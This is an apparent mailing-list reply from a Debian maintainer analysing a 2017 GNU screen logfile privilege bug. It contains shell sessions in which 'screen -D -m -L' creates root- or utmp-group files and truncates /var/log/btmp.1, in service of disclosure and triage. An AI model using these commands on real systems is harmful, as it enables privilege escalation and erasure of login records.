Hi, not replying on Savannah as I don't yet get the exact impact of this.
On Tue, Jan 24, 2017 at 07:05:10PM +0000, anonymous wrote: > > buczek@theinternet:/etc (master)$ screen -D -m -L bla.bla echo fail > > buczek@theinternet:/etc (master)$ ls -l bla.bla > > -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla > > buczek@theinternet:/etc (master)$ cat bla.bla > > fail > > buczek@theinternet:/etc (master)$ On Debian Unstable this does not work as a root exploit as screen does not run setuid. screen nevertheless runs setgid with group utmp: -rwxr-sr-x 1 root utmp 457608 Jan 18 16:54 /usr/bin/screen* So I'm able to gain access to /var/log/{btmp,wtmp,lastlog}*. I though can't really write to it, just erase it: /var/log → id uid=1000(abe) gid=1000(abe) groups=1000(abe),4(adm),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev),113(kvm) /var/log → ls -l btmp.1 -rw-rw---- 1 root utmp 384 Dec 24 17:03 btmp.1 /var/log → screen -D -m -L btmp.1 echo fail /var/log → ls -l btmp.1 -rw-rw---- 1 root utmp 0 Jan 24 21:06 btmp.1 So in my case nothing got written into the file (trying an existing file without write permissions to the according directory). Running the same game in /var/run/screen which is group-writable for utmp, I though can reproduce this a little bit better: /var/run/screen → ls -l total 0 drwx------ 2 abe abe 40 Jan 24 21:17 S-abe/ drwx------ 2 root root 60 Jan 16 00:23 S-root/ /var/run/screen → screen -D -m -L bla.bla echo fail /var/run/screen → ls -l total 4 drwx------ 2 abe abe 40 Jan 24 21:20 S-abe/ drwx------ 2 root root 60 Jan 16 00:23 S-root/ -rw-r--r-- 1 abe utmp 6 Jan 24 21:20 bla.bla /var/run/screen → cat bla.bla fail /var/run/screen → Am I right that, since screen later drops the set[ug]id rights, this only works if the file is newly created because then it is created with such permissions that I can later write into it without set[ug]id? Kind regards, Axel -- /~\ Plain Text Ribbon Campaign | Axel Beckert \ / Say No to HTML in E-Mail and News | a...@deuxchevaux.org (Mail) X See http://www.nonhtmlmail.org/campaign.html | a...@noone.org (Mail+Jabber) / \ I love long mails: http://email.is-not-s.ms/ | http://abe.noone.org/ (Web)